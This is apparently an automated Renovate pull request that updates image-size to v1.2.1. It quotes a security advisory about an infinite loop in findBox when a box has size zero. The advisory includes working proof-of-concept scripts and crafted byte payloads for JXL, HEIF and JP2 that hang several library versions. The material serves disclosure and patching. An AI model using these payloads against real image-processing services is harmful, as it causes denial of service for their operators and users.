Update dependency image-size to v1.2.1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
image-size	1.2.0 → 1.2.1

GitHub Vulnerability Alerts

GHSA-m5qc-5hw7-8vg7

Summary

image-size is vulnerable to a Denial of Service vulnerability when processing specially crafted images.

The issue occurs because of an infine loop in findBox when processing certain images with a box with size 0.

Details

If the first bytes of the input does not match any bytes in firstBytes, then the package tries to validate the image using other handlers:

// https://github.com/image-size/image-size/blob/v1.2.0/lib/detector.ts#L20-L31
export function detector(input: Uint8Array): imageType | undefined {
  const byte = input[0]
  if (byte in firstBytes) {
    const type = firstBytes[byte]
    if (type && typeHandlers[type].validate(input)) {
      return type
    }
  }

  const finder = (key: imageType) => typeHandlers[key].validate(input) //<--
  return keys.find(finder)
}

Some handlers that call findBox to validate or calculate the image size are jxl, heif and jp2.

JXL handler calls findBox inside validate. To reach the findBox call, the value at position 4:8 should be 'JXL '

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jxl.ts#L51-L60
export const JXL: IImage = {
  validate: (input: Uint8Array): boolean => {
    const boxType = toUTF8String(input, 4, 8)
    if (boxType !== 'JXL ') return false      //<---

    const ftypBox = findBox(input, 'ftyp', 0) //<---
    if (!ftypBox) return false

    const brand = toUTF8String(input, ftypBox.offset + 8, ftypBox.offset + 12)
    return brand === 'jxl '
  },

findBox can lead to an infinite loop because the value of box.size is 0, thus the offset variable is not updated. Below relevant code with comments (using one of the PAYLOAD below as example):

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L33-L37
export const readUInt32BE = (input: Uint8Array, offset = 0) =>
  input[offset] * 2 ** 24 +     // 0 +
  input[offset + 1] * 2 ** 16 + // 0 +
  input[offset + 2] * 2 ** 8 +  // 0 +
  input[offset + 3]             // 0

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L66-L75
function readBox(input: Uint8Array, offset: number) {   // offset: 0
  if (input.length - offset < 4) return
  const boxSize = readUInt32BE(input, offset)           // 0
  if (input.length - offset < boxSize) return           // (8 - 0) < 0 => false
  return {
    name: toUTF8String(input, 4 + offset, 8 + offset),  // 'JXL '
    offset,                                             // 0
    size: boxSize,                                      // 0
  }
}

// https://github.com/image-size/image-size/blob/v1.2.0/lib/types/utils.ts#L77-L84
export function findBox(input: Uint8Array, boxName: string, offset: number) { // boxName: 'ftyp', offset: 0
  while (offset < input.length) {         // 0 < 8 => false
    const box = readBox(input, offset)    // { name: 'JXL ', offset: 0, size: 0 }
    if (!box) break                       // false
    if (box.name === boxName) return box  // 'JXL ' === 'ftyp' => false
    offset += box.size                    // offset += 0
  }
}

A similar issue occurs for HEIF and JP2 handlers:

• https://github.com/image-size/image-size/blob/v1.2.0/lib/types/heif.ts
• https://github.com/image-size/image-size/blob/v1.2.0/lib/types/jp2.ts

PoC

Usage:

node main.js poc1|poc2

• poc for image-size@2.0.1

// mkdir 2.0.1
// cd 2.0.1/
// npm i image-size@2.0.1
const {imageSizeFromFile} = require("image-size/fromFile");
const {imageSize} = require("image-size");

const fs = require('fs');

// JXL
const PAYLOAD = new Uint8Array([
  0x00, 0x00, 0x00, 0x00, // Box with size 0
  0x4A, 0x58, 0x4C, 0x20, // "JXL "
]);

// HEIF
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x66, 0x74, 0x79, 0x70, // "ftyp"
//   0x61, 0x76, 0x69, 0x66  // "avif"
// ]);

// JP2
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x6A, 0x50, 0x20, 0x20, // "jP  "
// ]);

const FILENAME = "./poc.svg"

function createPayload() {
  fs.writeFileSync(FILENAME, PAYLOAD);
}

function poc1() { 
  (async () => {
    await imageSizeFromFile(FILENAME)
    console.log('Done') // never executed
  })();
}

function poc2() {
  imageSize(PAYLOAD)
  console.log('Done') // never executed
}

const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2

async function run() {
  createPayload()
  const args = process.argv.slice(2);
  const t = args[0];
  const poc = pocs.get(t) || poc1;
  console.log(`Running poc....`)
  await poc();
}

run();

• poc for image-size@1.2.0

// mkdir 1.2.0
// cd 1.2.0/
// npm i image-size@1.2.0
const sizeOf = require("image-size");
const fs = require('fs');

// JXL
const PAYLOAD = new Uint8Array([
  0x00, 0x00, 0x00, 0x00, // Box with size 0
  0x4A, 0x58, 0x4C, 0x20, // "JXL "
]);

// HEIF
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x66, 0x74, 0x79, 0x70, // "ftyp"
//   0x61, 0x76, 0x69, 0x66  // "avif"
// ]);

// JP2
// const PAYLOAD = new Uint8Array([
//   0x00, 0x00, 0x00, 0x00, // Box with size 0
//   0x6A, 0x50, 0x20, 0x20, // "jP  "
// ]);

const FILENAME = "./poc.svg"

function createPayload() {
  fs.writeFileSync(FILENAME, PAYLOAD);
}

function poc1() {
  sizeOf(FILENAME)
  console.log('Done') // never executed
}

function poc2() {
  sizeOf(PAYLOAD)
  console.log('Done') // never executed
}

const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2

async function run() {
  createPayload()
  const args = process.argv.slice(2);
  const t = args[0];
  const poc = pocs.get(t) || poc1;
  console.log(`Running poc....`)
  await poc();
}

run();

• poc for image-size@1.1.1

// mkdir 1.1.1
// cd 1.1.1/
// npm i image-size@1.1.1
const sizeOf = require("image-size");
const fs = require('fs');

// HEIF
const PAYLOAD = new Uint8Array([
  0x00, 0x00, 0x00, 0x00, // Box with size 0
  0x66, 0x74, 0x79, 0x70, // "ftyp"
  0x61, 0x76, 0x69, 0x66  // "avif"
]);

const FILENAME = "./poc.svg"

function createPayload() {
  fs.writeFileSync(FILENAME, PAYLOAD);
}

function poc1() {
  sizeOf(FILENAME)
  console.log('Done') // never executed
}

function poc2() {
  sizeOf(PAYLOAD)
  console.log('Done') // never executed
}

const pocs = new Map();
pocs.set('poc1', poc1); // node main.js poc1
pocs.set('poc2', poc2); // node main.js poc2

async function run() {
  createPayload()
  const args = process.argv.slice(2);
  const t = args[0];
  const poc = pocs.get(t) || poc1;
  console.log(`Running poc....`)
  await poc();
}

run();

Impact

Denial of Service

---

Release Notes

image-size/image-size (image-size)

v1.2.1

Compare Source

Fixes

• fix potential Denial of Service via specially crafted payloads in 640a67d

Full Changelog: image-size/image-size@v1.2.0...v1.2.1

---

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.